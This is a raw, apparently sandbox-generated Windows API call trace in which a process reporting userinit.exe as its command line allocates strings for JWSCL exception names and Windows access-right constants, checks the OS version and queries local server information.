[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a3f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a3f120*="EJwsclInvalidKnownSIDException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a3f108*="EJwsclInvalidComputer") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a3f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a3f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a3f0c0*="EJwsclInvalidSIDException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a3f0a8*="EJwsclInvalidSecurityListException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a3f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a3f078*="EJwsclEmptyACLException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a3f060*="EJwsclNILParameterException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a3f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a3f030*="EJwsclInvalidObjectArrayException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a3f018*="EJwsclProcessIdNotAvailable") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a3f000*="EJwsclWinCallFailedException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a3efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a3efd0*="EJwsclNotImplementedException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a3efb8*="EJwsclAccessTypeException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a3efa0*="EJwsclAdjustPrivilegeException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a3ef88*="EJwsclPrivilegeCheckException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a3ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a3ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a3ef40*="EJwsclPrivilegeException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a3ef28*="EJwsclNotEnoughMemory") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a3ef10*="EJwsclInvalidTokenHandle") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a3eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a3eee0*="EJwsclDuplicateTokenException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a3eec8*="EJwsclInvalidOwnerException") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a3eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0090.523] SysReAllocStringLen (in: pbstr=0x2a3ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a3ee98*="EJwsclTokenPrimaryException") returned 1
[0090.524] SysReAllocStringLen (in: pbstr=0x2a3ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a3ee80*="EJwsclTokenImpersonationException") returned 1
[0090.524] SysReAllocStringLen (in: pbstr=0x2a3ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a3ee68*="EJwsclTokenInformationException") returned 1
[0090.524] SysReAllocStringLen (in: pbstr=0x2a3ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a3ee50*="EJwsclSharedTokenException") returned 1
[0090.524] SysReAllocStringLen (in: pbstr=0x2a3ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a3ee38*="EJwsclOpenProcessTokenException") returned 1
[0090.524] SysReAllocStringLen (in: pbstr=0x2a3ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a3ee20*="EJwsclOpenThreadTokenException") returned 1
[0090.524] SysReAllocStringLen (in: pbstr=0x2a3ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a3ee08*="EJwsclSecurityException") returned 1
[0090.524] SysReAllocStringLen (in: pbstr=0x2a3edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a3edf0*="Exception") returned 1
[0090.524] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.524] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0090.524] GetVersionExA (in: lpVersionInformation=0x12f374*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x1e0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x9c\xf3\x12") | out: lpVersionInformation=0x12f374*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0090.524] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0090.524] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0090.530] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0090.530] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x12f3f8 | out: bufptr=0x12f3f8) returned 0x0
[0090.552] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0090.552] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0090.552] NetApiBufferFree (Buffer=0x201d00) returned 0x0
[0090.552] SetErrorMode (uMode=0x8000) returned 0x1
[0090.552] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0090.553] SetErrorMode (uMode=0x1) returned 0x8000
[0090.553] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.554] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.555] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.557] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ec40*="DELETE") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ec30*="READ_CONTROL") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ec20*="WRITE_OWNER") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ec10*="WRITE_DAC") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a3ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a3ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a3ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a3ebd0*="FILE_WRITE_DATA") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a3ebc0*="FILE_READ_DATA") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a3ebb0*="FILE_ALL_ACCESS") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3eb80*="STANDARD_RIGHTS_READ") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3eb70*="STANDARD_RIGHTS_ALL") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3eb50*="DELETE") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3eb40*="READ_CONTROL") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3eb30*="WRITE_OWNER") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3eb20*="WRITE_DAC") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a3eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a3eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a3eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0090.558] SysReAllocStringLen (in: pbstr=0x2a3eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a3eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a3ead0*="TOKEN_QUERY_SOURCE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a3eac0*="TOKEN_QUERY") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a3eab0*="TOKEN_IMPERSONATE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a3eaa0*="TOKEN_DUPLICATE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a3ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3ea80*="TOKEN_ALL_ACCESS") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3ea50*="STANDARD_RIGHTS_READ") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3ea40*="STANDARD_RIGHTS_ALL") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ea30*="DELETE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ea20*="READ_CONTROL") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ea10*="WRITE_OWNER") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ea00*="WRITE_DAC") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e9f0*="TIMER_MODIFY_STATE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a3e9e0*="TIMER_QUERY_STATE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e9d0*="TIMER_ALL_ACCESS") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e9a0*="STANDARD_RIGHTS_READ") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e990*="STANDARD_RIGHTS_ALL") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e980*="DELETE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e970*="READ_CONTROL") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e960*="WRITE_OWNER") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e950*="WRITE_DAC") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a3e940*="SECTION_EXTEND_SIZE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a3e930*="FILE_MAP_READ") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a3e920*="FILE_MAP_WRITE") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a3e910*="FILE_MAP_COPY") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a3e900*="FILE_MAP_ALL_ACCESS") returned 1
[0090.559] SysReAllocStringLen (in: pbstr=0x2a3e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e8d0*="STANDARD_RIGHTS_READ") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e8b0*="DELETE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e8a0*="READ_CONTROL") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e890*="WRITE_OWNER") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e880*="WRITE_DAC") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e870*="MUTEX_MODIFY_STATE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e860*="MUTEX_ALL_ACCESS") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e840*="STANDARD_RIGHTS_WRITE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e830*="STANDARD_RIGHTS_READ") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e820*="STANDARD_RIGHTS_ALL") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e810*="DELETE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e800*="READ_CONTROL") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e7f0*="WRITE_OWNER") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e7e0*="WRITE_DAC") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e7d0*="EVENT_MODIFY_STATE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e7c0*="EVENT_ALL_ACCESS") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e790*="STANDARD_RIGHTS_READ") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e780*="STANDARD_RIGHTS_ALL") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e770*="DELETE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e760*="READ_CONTROL") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e750*="WRITE_OWNER") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e740*="WRITE_DAC") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a3e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a3e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e700*="STANDARD_RIGHTS_WRITE") returned 1
[0090.560] SysReAllocStringLen (in: pbstr=0x2a3e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e6f0*="STANDARD_RIGHTS_READ") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e6d0*="DELETE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e6c0*="READ_CONTROL") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e6b0*="WRITE_OWNER") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e6a0*="WRITE_DAC") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a3e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a3e680*="JOB_OBJECT_TERMINATE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a3e670*="JOB_OBJECT_QUERY") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a3e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a3e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e620*="STANDARD_RIGHTS_WRITE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e610*="STANDARD_RIGHTS_READ") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e600*="STANDARD_RIGHTS_ALL") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e5f0*="DELETE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e5e0*="READ_CONTROL") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e5d0*="WRITE_OWNER") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e5c0*="WRITE_DAC") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a3e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a3e5a0*="THREAD_IMPERSONATE") returned 1
